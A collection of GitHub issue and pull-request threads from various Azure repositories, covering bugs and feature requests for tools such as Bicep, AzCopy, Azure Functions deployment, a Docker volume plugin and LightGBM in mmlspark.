This is great work ❤️ . I think we probably want to merge https://github.com/Azure/azure-sdk-for-rust/pull/79 first since many modifications are probably going to create conflicts.
|
2025-04-01T06:36:45.531105
| 2023-05-24T23:01:11
|
1724841839
|
{
"authors": [
"JonathanCrd",
"maririos"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:369",
"repo": "Azure/azure-sdk-tools",
"url": "https://github.com/Azure/azure-sdk-tools/issues/6237"
}
|
gharchive/issue
|
Add default users to prod release plans
Share Release Plans created in PROD with the v-team so we can help diagnose problems and look at behaviors, especially while we do our initial rollout.
Ideally, Release Plans shouldn't have any permissions and anyone can access them
Both options (adding default users to all release plans, or removing the permissions) would take the same amount of work. Since the future goal is to remove those permissions, I would suggest we start by removing them.
I have a question, in the Release Plans list view, what should be the filter? Only show the release plans for products from the selected service? Or show all of them? How could we avoid having too many records that are not relevant for the user?
I have a question, in the Release Plans list view, what should be the filter? Only show the release plans for products from the selected service? Or show all of them? How could we avoid having too many records that are not relevant for the user?
Great question. Having all will be too much noise. Filter by the service selected will work for our users (and not for the admins).
@ccbarragan how is this handled in the new UI?
As a first step, I modified the list of the Release Plans and now it shows all the release plans for the selected Service.
Also, I removed all permission restrictions in the Release Planner app; however, we must do the same for all other apps, since there is logic in them relying on users' permissions. To work around this, the current user gets added as an owner of the release plan whenever they click the link to open any Readiness App.
Opening this GitHub issue to keep track of those changes:
https://github.com/Azure/azure-sdk-tools/issues/6369
I forgot to summarize the changes that were made here. This is what changed:
In the Release Planner App
Brand new List of the release plans
Shows all the release plans for the selected service, not only the ones that are owned by the user
Searchable by: Name, Lifecycle stage, Product name, API type, Created by and Status.
UI enhancements: Responsive, cleaner, and leans toward the new proposed UI for the App.
Added Deeplink support for release plans
Release plans can be directly opened from a URL.
In the new "Summary" screen, added an option to copy a URL to easily share the current release plan
Added a warning in the Permissions section for a Release Planner, saying that permissions are getting deprecated in future versions, and there's no need to manually add users there anymore.
|
2025-04-01T06:36:45.532863
| 2022-08-30T18:59:49
|
1356178460
|
{
"authors": [
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:370",
"repo": "Azure/azure-sdk",
"url": "https://github.com/Azure/azure-sdk/issues/4768"
}
|
gharchive/issue
|
SDK Review Meeting - Tracking Azure Communication Services
This meeting was created by Jorge Garcia Hirota.
It will be used to Track the conversation in the informational Session for the Azure Communication Services Service.
Detailed meeting information and documents provided can be accessed here
Cancelled by: Jorge Garcia Hirota
|
2025-04-01T06:36:45.541174
| 2018-10-02T17:06:15
|
365993420
|
{
"authors": [
"MRayermannMSFT",
"zezha-msft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:371",
"repo": "Azure/azure-storage-azcopy",
"url": "https://github.com/Azure/azure-storage-azcopy/issues/70"
}
|
gharchive/issue
|
When output=json is used for copy, some errors aren't outputted in a JSON friendly way
Which version of the AzCopy was used?
10.0.2-preview
Which platform are you using? (ex: Windows, Mac, Linux)
Windows
What command did you run?
I ran
copy "C:\Users\marayerm\Desktop\*" "https://redacted.blob.core.windows.net/one/?REDACTED" --overwrite=false --follow-symlinks --recursive --fromTo=LocalBlob --include "New Text Document.txt;" --output=json
when there is no file at C:\Users\marayerm\Desktop\New Text Document.txt
What problem was encountered?
Although output=json was specified, the output I received was "failed to perform copy command due to error: cannot start job due to error: nothing can be uploaded, please use --recursive to upload directories.", which is not JSON. I have seen other situations where this happens, but this is the easiest to reproduce. Basically, if output=json is used, then all output should be formatted as JSON objects.
How can we reproduce the problem in the simplest way?
Try to do a copy where the source does not exist.
Have you found a mitigation/solution?
No.
@MRayermannMSFT thanks for reporting this issue!
I've logged it to be fixed.
Another scenario where this happens is when uploading an empty folder.
This also happens if you do not have permissions to read the contents of the blob container/file system.
Fixed in 10.0.8.
|
2025-04-01T06:36:45.543700
| 2017-08-30T19:41:47
|
254112916
|
{
"authors": [
"dnfclas",
"omkarmore83"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:372",
"repo": "Azure/azure-webjobs-sdk-script",
"url": "https://github.com/Azure/azure-webjobs-sdk-script/pull/1848"
}
|
gharchive/pull-request
|
Enabling TransferRequestHandler for all request
(This will include static content. The reason we do this is to enable routes with a period in them, i.e. with extensions.)
Look at the issue #969
Essentially, Functions currently does not allow paths to have a period in them, for instance /index.html. Proxies does allow users to have such paths. With Proxies merging with Functions, this creates a problem. To enable such paths, we need to ensure that the managed modules are executed for such paths. There are a couple of ways of enabling this, as mentioned in the issue.
The change made here is a way of ensuring that TransferRequestHandler is invoked for all requests
@omkarmore83,
Thanks for having already signed the Contribution License Agreement. Your agreement was validated by .NET Foundation. We will now review your pull request.
Thanks,
.NET Foundation Pull Request Bot
|
2025-04-01T06:36:45.572107
| 2016-12-11T20:52:56
|
194855679
|
{
"authors": [
"ahmetalpbalkan",
"gjonespf",
"markvr",
"powareverb"
],
"license": "apache-2.0",
"license_source": "bigquery",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:373",
"repo": "Azure/azurefile-dockervolumedriver",
"url": "https://github.com/Azure/azurefile-dockervolumedriver/issues/78"
}
|
gharchive/issue
|
Containerize the volume plugin
I'm sure you're aware of this, but I thought I'd voice my interest after using this plugin on a few machines and really liking it.
Documented here:
https://docs.docker.com/engine/extend/plugin_api/
It has plugins running as "special" Docker containers, brought up before Docker proper and shut down after Docker stops. I'm not sure how the way they work interacts with the fact that you're using SMB tools/permissions/privileges. I think you're already using some of the ideas, so it might not be an issue. It would make installing the plugin very simple and much cleaner, however, once plugins come out of experimental.
@gjonespf we tried to containerize the driver; however, the main problem is that the driver executes mount commands to mount SMB shares on Linux. When we containerize, the mounts are restricted to the container's namespace and therefore do not appear on the Linux host, thus not available to containers using the volumes. Last time I checked, this was a limitation of Docker (or the Linux kernel).
If the situation has changed, we can take a look at containerizing the driver. BTW in the docs you sent, I don't see "running as special docker containers" reference. Could you please quote?
Indeed, wondered if this may be an issue. Would suggest that issue (containerized mounts) should be upstream on docker, as I'd expect having mount tools working correctly for plugins would be pretty critical for anything doing volume plugins based on mount. I raised the suggestion more as an easier way for people to install/update this driver. That being said, I'm at a loss to find much on docker plugin infra at all, and current suggestion (on the page I linked) is to run them outside of containers (as you're already doing).
Re: "special" containers - I believe I read it on some Weave documentation, I'm unable to find much on plugins as containers tbh.
Also unsure as to how these fit into the existing Kubernetes plugin infrastructure.
Oh, for ref here is how the Weave team is doing it. Looks like they've got separate Docker/CNI plugins.
https://github.com/weaveworks/weave/tree/master/plugin
Would suggest that issue (containerized mounts) should be upstream on docker
It's here:
https://github.com/docker/docker/issues/10088
https://github.com/docker/docker/issues/14630
https://github.com/docker/docker/issues/17034
Looks like it is merged now. Perhaps we should give it a try. This was the only reason we could not containerize the plugin back in the day.
Everything I read pretty much implies to me that volume plugins are still very experimental.
Volume plugins support have been out for pretty long and the API has gone many revisions, I think things have settled down at this point and we have a stable mechanism.
I'm changing the title to reflect the latest here.
Nice work, yeah those items look a good reflection. Experimental - agreed, it's been around for a year or two, just wasn't seeing much documentation to help you out. Expect if the mounts work, then it's "just" a case of sorting out how to build plugin api wrapper to handle mounting etc commands.
@ahmetb
hi, is this likely to happen please? I note the the "docker-for-azure" project has implemented this with their "cloudstor" plugin (https://docs.docker.com/docker-for-azure/persistent-data-volumes/) but that is only (officially) available if using that project, and it is closed source with minimal docs.
Enabling mounting Azure storage using docker plugin would be very useful. Otherwise it severely limits the use of Docker on Azure.
@markvr as @ahmetb is now working at Kubernetes would expect that it's not high on his priority list, and don't blame him. I'm still keen on this, but have started looking at other avenues to solve same problem. Docker plugin infra is finally maturing so would suggest it's getting easier for anyone to jump in and try this stuff out.
I would have hoped that Microsoft could have more than one person supporting their products. I like the open source approach they've taken with a lot of things, but they seem to just abandon a lot of them as well, which makes it impossible to know if we can rely on them for production systems.
|
2025-04-01T06:36:45.577046
| 2022-01-05T15:30:00
|
1094475031
|
{
"authors": [
"jackrichins",
"jeskew",
"jlichwa",
"tfitzmac"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:374",
"repo": "Azure/bicep-types-az",
"url": "https://github.com/Azure/bicep-types-az/issues/579"
}
|
gharchive/issue
|
Data property on Microsoft.KeyVault/vaults/keys defined as string but labeled with any
The Microsoft.KeyVault/vaults/keys resource type has a property called "data" within the "release_policy" object. In the swagger, it's defined as a string. But, it gets generated as "any".
This log entry may be relevant. The Swagger definition indicates that the data property should be base64-encoded bytes, and I'm not sure which Autorest type that would be translated into. The any type is used as a fallback when a field's type is not recognized.
It should be type string (it is just encoded string).
Examples here https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/template-functions-string#examples-2
The Bicep autorest plugin uses Autorest's ModelerFour framework, which applies a binary schema to base64 encoded strings. This seems appropriate for SDK generation, where the SDK would be responsible for taking a byte buffer and converting it to the expected wire format, but is probably not exactly what we want in Bicep.
@jlichwa If a user wants to supply a policy today in a Bicep or ARM JSON file, do they need to provide a base64-encoded string? I can put together a test if you don't know.
Yes, it needs to be a base64-encoded string.
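For illustration only, a minimal Python sketch of producing such a base64-encoded value outside of a template; the policy body below is a made-up placeholder, not the official release-policy schema, and inside a template the base64() function linked above achieves the same thing:
import base64
import json

# Hypothetical policy content -- placeholder only, not an official schema
policy = {"version": "1.0.0", "anyOf": [{"allOf": [{"claim": "example-claim", "equals": "true"}]}]}

# The data property expects the policy as a base64-encoded string
encoded = base64.b64encode(json.dumps(policy).encode("utf-8")).decode("ascii")
print(encoded)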
|
2025-04-01T06:36:45.587339
| 2020-08-27T13:43:05
|
687254123
|
{
"authors": [
"JayDoubleu",
"Lddeiva",
"SPSamL",
"TazzyMan",
"alex-frankel",
"enbridgeint",
"jfe7",
"jikuja",
"sebader",
"sebbrochet",
"takekazuomi",
"thebeautiful",
"thebenwaters"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:375",
"repo": "Azure/bicep",
"url": "https://github.com/Azure/bicep/issues/363"
}
|
gharchive/issue
|
Support to split template into multiple files?
Have you thought about supporting splitting one bicep files into multiple files within the same directory and merging them on build?
I find this a very neat feature in terraform to make larger templates with many resources easier to read - without using modules, that is a different use case for me.
Like:
storageaccounts.bicep
sqldb.bicep
keyvault.bicep
bicep build .
==> my_combined_arm_template.json
Some use cases I would use splitting:
logic app templates
everything which is entered in the template as an escaped JSON string, e.g. Log Analytics workbooks.
Splitting and loading bicep files would be very useful feature.
As well as functions to load external files and preparing payloads using the bicep language.
Similar to terraform:
local variables
file function
yaml and json decode/encode
Also it would allow for modularity.
Sure, merging local files is a good feature. Take it one step further and support remote git files. That way we can get versioning too. Versioning is a must if you use the bicep file like a module.
Seconding this and also liking to add that this would be nice with modules.
For readability it would be nice to separate a module into a folder with
resource.bicep
params.bicep
variables.bicep
outputs.bicep
It's a bit unfortunate that ARM JSON file interpreters don't natively support JSON Pointer (RFC 6901) (while we could probably imagine a pre-processor adding it!).
I had recently to compose a lot of JSON "definition" files (of my own) into a single object structure before loading them in memory.
And JSON Pointer definitely helped me managing complexity while being able to check consistency as part of my unit tests.
BTW I was already toying with ARM JSON file generation a few years ago leveraging Jinja2 :)
But as it's only "syntactic macros", a lot of semantic issues are not detected as they should be (and as they are with something like Bicep)...
This would be great if we could split out Bicep files like that!
Any news on this?
Like I said in issue #7726 I would then also like to add parameters and expressions (to do some string manipulation if needed) to add re-use value (predefined template files for several resources with all the properties that are always the same in your organization)
Good ask... For me, I want parameters in one file and the remaining code in another file. Is it possible?
I have n number of resources to create, so it would be good and traceable if we had one file for params and different files for resources/modules.
When using Terraform, this template was the initial setup of other organizations', or tenants', spoke subscription. It deployed a core set of resources to integrate with the common services/hub subscription. They're split mostly by resource type plus Data Sources (Existing resources in Bicep), outputs, providers, and variables (Bicep Parameters). It was deployed by the same team every time. Modules are overkill for the resource types with multiple instances because they had different requirements for configurations such as 3 different Key Vaults: 1 for Customer Managed Keys, 1 for Certificates, and another for Secrets. They each had a specific set of access for the service account creating them and their secrets/keys/certs and different network restrictions. I simplified it down to a handful of variables/parameters that were required for each to basically just the name and location. The *_permissions were the same for each tenant.
It's also easier for the team, which I've left, to maintain or update than as a single file which would be around 2000 lines of code.
@alex-frankel Is this still being considered? One of our customers is hitting the limit and wants to know if there are any solutions.
@lddeiva - it's not being actively considered. Having said that, I don't think implementing this would address the limit you are talking about. I am assuming you are talking about the 4MB template size limit? We have a separate work item to try to get that limit raised.
Would be very nice to split up NSG rules, Sentinel rules or Firewall rules (1 rule = 1 file). Also Azure workbooks, as already mentioned.
|
2025-04-01T06:36:45.593311
| 2022-06-21T17:05:33
|
1278734445
|
{
"authors": [
"alex-frankel",
"anthony-c-martin",
"dairta"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:376",
"repo": "Azure/bicep",
"url": "https://github.com/Azure/bicep/issues/7317"
}
|
gharchive/issue
|
Bicep intellisense partially working
Bicep version
version 0.4.613
Describe the bug
typing res brings up intellisense options for resources
I cannot get intellisense to give me suggestions in between the quotes. Not specific to keyvaults.
typing resource kv '' should return Microsoft.Something/@date
Microsoft.KeyVault/vaults@2019-09-01
To Reproduce
install/reinstall the vscode extension
Additional context
Once I get Microsoft.KeyVault/vaults@2019-09-01 loaded I get intellisense options for accessPolicies, enablePurgeProtection, enableRbacAuthorization, and others.
@dairta, you're on a very old version of the Bicep extension. Could you try and repro this on the latest? (0.7.4)
uninstalling and reinstalling the 0.7.4 version still shows bicep --version
Bicep CLI version 0.4.613. My terminal launches in pwsh v7.
I've looked at this and it's what I am experiencing on a new install.
https://github.com/Azure/bicep/issues/1780
The vs code extension and the bicep CLI are separate installs. Can you look at the version in VS code?
Also, separately, you also have two different versions of the bicep CLI installed. If that's not intentional/desired, you can follow this to make sure you only have one:
https://docs.microsoft.com/en-us/azure/azure-resource-manager/bicep/installation-troubleshoot#multiple-versions-of-bicep-cli-installed
|
2025-04-01T06:36:45.595632
| 2022-11-11T15:57:22
|
1445673403
|
{
"authors": [
"SDanehy",
"alex-frankel"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:377",
"repo": "Azure/bicep",
"url": "https://github.com/Azure/bicep/issues/8987"
}
|
gharchive/issue
|
Bicep validation is wrong for Event Hub Namespace
When adding a new property to a "Microsoft.EventHub/namespaces@2022-01-01-preview" resource I get the following error:
The property "minimumTlsVersion" is not allowed on objects of type "EHNamespaceProperties". Permissible properties include "clusterArmId", "encryption", "privateEndpointConnections".
Per Microsoft's documentation this is a valid property. https://learn.microsoft.com/en-us/azure/templates/microsoft.eventhub/namespaces?pivots=deployment-language-bicep
Can you share the bicep code you are using? Is this throwing an error in VS code or when you attempt to deploy the bicep file?
Closing due to no response
|
2025-04-01T06:36:45.598448
| 2023-09-13T11:31:12
|
1894330923
|
{
"authors": [
"anthony-c-martin"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:378",
"repo": "Azure/bicep",
"url": "https://github.com/Azure/bicep/pull/11829"
}
|
gharchive/pull-request
|
Build workflow improvements
Add action to log preview install scripts
Summarize dotnet test results into single comment rather than 4 separate comments
Split VSCode into build & test jobs. This means you get a working VSCode package even if there are lint or test failures.
Microsoft Reviewers: Open in CodeFlow
Checks are all passing - there are just some required checks which have been renamed, which explains why the PR shows this:
|
2025-04-01T06:36:45.603291
| 2023-03-28T18:37:18
|
1644477505
|
{
"authors": [
"Aniruddh25",
"yorek"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:379",
"repo": "Azure/data-api-builder",
"url": "https://github.com/Azure/data-api-builder/issues/1374"
}
|
gharchive/issue
|
Add support for providing environment var/values in a .env file read by dotenv.net
Discussed in https://github.com/Azure/data-api-builder/discussions/1361
Originally posted by glaucia86 March 25, 2023
Hi!
I would like to propose that we can make use of the .env file in the dab.config.json file.
As it already happens with the files generated by the SWA CLI: staticwebapp.database.config.json (example: HERE)
Because the connection string is very exposed, as it contains extremely sensitive data such as login, password and database name.
This issue is to add support for .env so that I can just put my sensitive data into the .env, if I don't need the complexity of having multiple configuration files.
This is separate from the current @env() feature where we need to set environment variables on the system.
Two libraries for this option:
https://github.com/tonerdo/dotnet-env
https://github.com/bolorundurowb/dotenv.net
Looking forward to this! :)
|
2025-04-01T06:36:45.610277
| 2023-02-21T19:39:10
|
1594003996
|
{
"authors": [
"ashnamehrotra"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:380",
"repo": "Azure/eraser",
"url": "https://github.com/Azure/eraser/pull/639"
}
|
gharchive/pull-request
|
chore: cherry pick for v1.0.0
What this PR does / why we need it:
Cherry pick main changes since v1.0.0-rc.2 for v1.0.0 release.
(cherry picked #608 #618 #621 #620 #622 #628 #631 #632 #635)
Which issue(s) this PR fixes (optional, using fixes #<issue number>(, fixes #<issue_number>, ...) format, will close the issue(s) when the PR gets merged):
Fixes #
Special notes for your reviewer:
closing, fixed in PR #640
|
2025-04-01T06:36:45.621975
| 2024-03-04T22:52:00
|
2167930745
|
{
"authors": [
"mxmo0rhuhn",
"patelchandni",
"ricardolimadb"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:381",
"repo": "Azure/functions-action",
"url": "https://github.com/Azure/functions-action/issues/218"
}
|
gharchive/issue
|
No documented way to deploy to consumption based linux functions (e.g. Python)
By now I have spent several days trying to figure out how to deploy a Python function to a consumption-based plan using this action and I have come to the conclusion that this is not possible. However, there is no warning or any indication about this. Please add either documentation on how to do it or a warning that it is not possible.
Setup
Python is supported only on a Linux-based hosting plan when it's running in Azure.
source
Function App
Operating System: Linux
App Service Plan Pricing plan: Y1 (consumption based)
Runtime version: <IP_ADDRESS>
FUNCTIONS_WORKER_RUNTIME: python
FUNCTIONS_EXTENSION_VERSION: ~4
Action configuration
- name: 'Run Azure Functions Action'
uses: Azure/functions-action@v1
id: fa
with:
app-name: ${{ env.AZURE_FUNCTIONAPP_NAME }}
slot-name: ${{ env.AZURE_FUNCTIONAPP_SLOT }}
package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
publish-profile: ${{ secrets.AZURE_FUNCTIONAPP_PUBLISH_PROFILE }}
respect-funcignore: true
scm-do-build-during-deployment: true
enable-oryx-build: true
The action is exactly in line with the example. The slot-name has been added or removed but is irrelevant for the behaviour.
Repository structure
The repository contains a Hello world application using exactly the setup of the official documentation
Behaviour
In essence the problem boils down to the possible states of the WEBSITE_RUN_FROM_PACKAGE environment variable in the Azure Function.
Without WEBSITE_RUN_FROM_PACKAGE
A newly created Azure Function does not have the environment variable set. Therefore, the execution of the azure function fails.
Error: Failed to deploy web package to App Service.
Error: Execution Exception (state: PublishContent) (step: Invocation)
Error: When request Azure resource at PublishContent, zipDeploy : Failed to use /home/runner/work/_temp/temp_web_package_2623855960744894.zip as ZipDeploy content
Error: Package deployment using ZIP Deploy failed. Refer logs for more details.
Error: Deployment Failed!
Btw. there is no indication where to find the logs that the error message is referring to in case of the failure. The link to the xxx.scm.azurewebsites.net logs is only displayed in case of a successful deployment .
With WEBSITE_RUN_FROM_PACKAGE = 1
In this case the GitHub action runs through without an error. However, the deployed function is not visible in the Azure Portal. This is somewhat expected behaviour as the documentation clearly states that Linux Consumption based Functions need to set the value to a URL:
External package URL is the only supported deployment method for Azure Functions running on Linux in the Consumption plan
Source
Other source
With WEBSITE_RUN_FROM_PACKAGE = URL
The expected solution is to set the WEBSITE_RUN_FROM_PACKAGE to a URL that is created during the deployment of the function using this GitHub Action e.g. the value of the SCM_RUN_FROM_PACKAGE variable. However, in this scenario the GitHub Action also fails:
Error: Execution Exception (state: PublishContent) (step: Invocation)
Error: When request Azure resource at PublishContent, zipDepoy : WEBSITE_RUN_FROM_PACKAGE in your function app is set to an URL. Please remove WEBSITE_RUN_FROM_PACKAGE app setting from your function app.
Error: Deployment Failed!
The suggested fix to remove the variable unfortunately does not work, as stated above.
With WEBSITE_RUN_FROM_PACKAGE = anything else
For the sake of completeness I also tried to run the action with something else than the official options. As expected, the function fails with:
Error: Failed to deploy web package to App Service.
Error: Execution Exception (state: PublishContent) (step: Invocation)
Error: When request Azure resource at PublishContent, zipDeploy : Failed to use /home/runner/work/_temp/temp_web_package_5530634294070984.zip as ZipDeploy content
Error: Package deployment using ZIP Deploy failed. Refer logs for more details.
Error: Deployment Failed!
Conclusion
Given that none of the options results in a working Azure function I have to assume that it is just not possible to use this action for consumption based Linux functions. I would be more than happy if you could highlight my mistake.
WEBSITE_RUN_FROM_PACKAGE = 1 is not supported for Linux apps on the Consumption plan. Documented here: https://learn.microsoft.com/en-us/azure/azure-functions/run-functions-from-deployment-package
WEBSITE_RUN_FROM_PACKAGE = URL will only work with this action if you are using a service principal and not a publish profile. Also, it will not support remote build.
If you want remote build, then use a publish profile and pass the remote build parameters with this action. Also, remove the WEBSITE_RUN_FROM_PACKAGE app setting from your app.
Dear @patelchandni thanks a lot for summarizing the behaviour of WEBSITE_RUN_FROM_PACKAGE again.
Could you provide a working example of how to deploy a consumption based linux function with this action?
I have the same problem and I can't find a way to deploy in consumption mode (sku=Y1).
|
2025-04-01T06:36:45.624513
| 2023-05-01T17:37:42
|
1691106648
|
{
"authors": [
"Elsie4ever",
"digimaun"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:382",
"repo": "Azure/iot-plugandplay-models-tools",
"url": "https://github.com/Azure/iot-plugandplay-models-tools/pull/198"
}
|
gharchive/pull-request
|
Update dmr client to GA DTDL parser
Update dmr client to GA DTDL parser 1.0.52
Added a new test case according to the Changes from Version 2 guideline
Resolving issue https://github.com/Azure/iot-plugandplay-models-tools/issues/197.
|
2025-04-01T06:36:45.632125
| 2018-10-26T05:22:25
|
374231054
|
{
"authors": [
"imatiach-msft",
"stevekuo4"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:383",
"repo": "Azure/mmlspark",
"url": "https://github.com/Azure/mmlspark/issues/411"
}
|
gharchive/issue
|
add weight to lightgbm
in our use case we need to include sample weight for model training, which is not available for LightGBMClassifier
this has been resolved with PR #426; the fix will be in the next release of mmlspark, v0.15. You can test out the fix with the build here:
--packages
com.microsoft.ml.spark:mmlspark_2.11:0.14.dev30+2.gb5960fb
and --repositories
https://mmlspark.azureedge.net/maven
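For reference, a minimal PySpark sketch of how the sample-weight support might be used; the weightCol parameter name and the DataFrame/column names here are assumptions for illustration, not taken from the PR:
from pyspark.sql import SparkSession
from pyspark.ml.feature import VectorAssembler
from mmlspark import LightGBMClassifier

spark = SparkSession.builder.getOrCreate()
# Hypothetical training data with two features, a label and a per-row weight
raw_df = spark.createDataFrame(
    [(0.1, 1.2, 0, 1.0), (0.4, 0.7, 1, 2.5)],
    ["f1", "f2", "label", "weight"],
)
train = VectorAssembler(inputCols=["f1", "f2"], outputCol="features").transform(raw_df)

# weightCol tells the trainer to use the "weight" column as per-sample weights
model = LightGBMClassifier(
    labelCol="label", featuresCol="features", weightCol="weight"
).fit(train)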
|
2025-04-01T06:36:45.687624
| 2022-06-06T20:09:41
|
1262351679
|
{
"authors": [
"JohnathonMohr",
"lucas-lelis"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:384",
"repo": "Azure/template-analyzer",
"url": "https://github.com/Azure/template-analyzer/issues/246"
}
|
gharchive/issue
|
[BUG] Array of objects is not being evaluated correctly
Describe the bug
When trying to use a wildcard to evaluate an array of objects to validate if an object key exists in each array entry the rules are not evaluated properly:
{
"name": "resourceName",
"type": "Microsoft.Resources/deployments",
"apiVersion": "2021-04-01",
"resourceGroup": "resourceGroup",
"properties": {
"mode": "Incremental",
"templateLink": {
"id": "<Template-Link>"
},
"parameters": {
"secretsObject": {
"value": {
"secrets": [
{
"secretValue": "secret-value-1"
},
{
"secretValue": "secret-value-2"
}
]
}
}
}
}
}
Rule:
"evaluation": {
"resourceType": "Microsoft.Resources/deployments",
"allOf": [
{
"path": "properties.parameters.secretsObject.value.secrets[*].secretName",
"exists": true
}
]
}
Expected behavior
It should fail without the need to add a specific evaluation to each array entry:
"path": "properties.parameters.secretsObject.value.secrets[0].secretName"
"path": "properties.parameters.secretsObject.value.secrets[1].secretName"
Reproduction Steps
Run the tool against a template like the example above.
Environment
No response
Hi @lucas-lelis, thanks for the feedback.
Since wildcards are evaluated based on whether or not the full path resolves to an existing property, I believe the issue here is that the rule isn't returning anything to evaluate since the property in question doesn't exist, so it's skipped. This is somewhat mentioned in the rule authoring guide, but is not very clear on what's happening.
"When a wildcard is used, zero or more paths in the template will be found that match path. If zero paths are found, the operator in the Evaluation is skipped, as there is nothing to evaluate"
Can you try making a small modification to your rule and let us know if this works for you?
"evaluation": {
"resourceType": "Microsoft.Resources/deployments",
"allOf": [
{
"path": "properties.parameters.secretsObject.value.secrets[*]",
"allOf": [
{
"path" : "secretName",
"exists": true
}
]
}
]
}
The additional operator used for evaluating the remaining path after the wildcard isn't very intuitive, so I've created #247 to help with this.
Thx for the feedback @JohnathonMohr !
It did work as expected with those changes.
|
2025-04-01T06:36:45.690094
| 2024-07-12T03:11:28
|
2404557876
|
{
"authors": [
"mbilalamjad"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:385",
"repo": "Azure/terraform-azurerm-avm-res-compute-hostgroup",
"url": "https://github.com/Azure/terraform-azurerm-avm-res-compute-hostgroup/pull/31"
}
|
gharchive/pull-request
|
chore: repository governance
Repository governance update
This PR was automatically created by the AVM Team hive-mind using the grept governance tool.
We have detected that some files need updating to meet the AVM governance standards.
Please review and merge with alacrity.
Grept config source: git::https://github.com/Azure/Azure-Verified-Modules-Grept.git//terraform
Thanks! The AVM team :heart:
Superseded by #32
|
2025-04-01T06:36:45.704379
| 2024-09-14T04:26:34
|
2525985105
|
{
"authors": [
"ArcturusZhang",
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:388",
"repo": "Azure/typespec-azure",
"url": "https://github.com/Azure/typespec-azure/pull/1541"
}
|
gharchive/pull-request
|
[TCGC] update references for #1463
Update references after merged #1463
All changed packages have been documented.
:white_check_mark: @azure-tools/typespec-azure-resource-manager
:white_check_mark: @azure-tools/typespec-client-generator-core
Show changes
@azure-tools/typespec-azure-resource-manager - feature ✏️
x-ms-skip-url-encoding should be replaced with allowReserved
@azure-tools/typespec-client-generator-core - breaking ✏️
1. The kind for unknown renamed from any to unknown.
2. The values property in SdkUnionType renamed to variantTypes.
3. The values property in SdkTupleType renamed to valueTypes.
4. The example types for parameter, response and SdkType have been renamed to XXXExampleValue to emphasize that they are values instead of the example itself.
5. The @format decorator is no longer able to change the type of the property.
@azure-tools/typespec-client-generator-core - fix ✏️
Fix naming logic for anonymous model wrapped by HttpPart
@azure-tools/typespec-client-generator-core - breaking ✏️
no longer export the SdkExampleValueBase
You can try these changes here
🛝 Playground
🌐 Website
📚 Next docs
|
2025-04-01T06:36:45.707467
| 2020-11-07T23:09:10
|
738334495
|
{
"authors": [
"KYZITEMELOS93",
"itowlson"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:389",
"repo": "Azure/vscode-kubernetes-tools",
"url": "https://github.com/Azure/vscode-kubernetes-tools/issues/837"
}
|
gharchive/issue
|
Extension issue
Issue Type: Bug
Extension Name: vscode-kubernetes-tools
Extension Version: 1.2.1
OS Version: Windows_NT x64 10.0.17763
VSCode version: 1.51.0
:warning: We have written the needed data into your clipboard. Please paste! :warning:
Should be fixed in 1.2.3 - please reopen if not
|
2025-04-01T06:36:45.709719
| 2018-04-06T21:31:54
|
312125756
|
{
"authors": [
"brendandburns"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:390",
"repo": "Azure/vscode-kubernetes-tools",
"url": "https://github.com/Azure/vscode-kubernetes-tools/pull/162"
}
|
gharchive/pull-request
|
Add a drill-down for Pods created by a Deployment.
This goes straight from Deployment -> Pods
Another option would be:
Deployment -> ReplicaSet -> Pods
If we'd rather, easy to do, let me know.
Comments addressed, please re-check.
@testforstephen comment addressed, please re-check.
Thanks!
|
2025-04-01T06:36:45.712203
| 2020-05-27T10:35:12
|
625578786
|
{
"authors": [
"brentschmaltz",
"gislikonrad"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:391",
"repo": "AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet",
"url": "https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/pull/1424"
}
|
gharchive/pull-request
|
Fixes typo in RenewResponse action in WsTrust 1.3
There was a copy-paste error in one of the WsTrust 1.3 actions.
@gislikonrad I rebased on dev and squashed before I saw your pr, sorry. It is hard to see what your PR was now. Can you re-submit.
I merged my branch. Now you should be able to see the change. Do you still want me to resubmit the PR?
@gislikonrad thanks for catching this!
Sure
|
2025-04-01T06:36:45.721487
| 2019-03-26T20:25:43
|
425632081
|
{
"authors": [
"JPWilli",
"MarkZuber"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
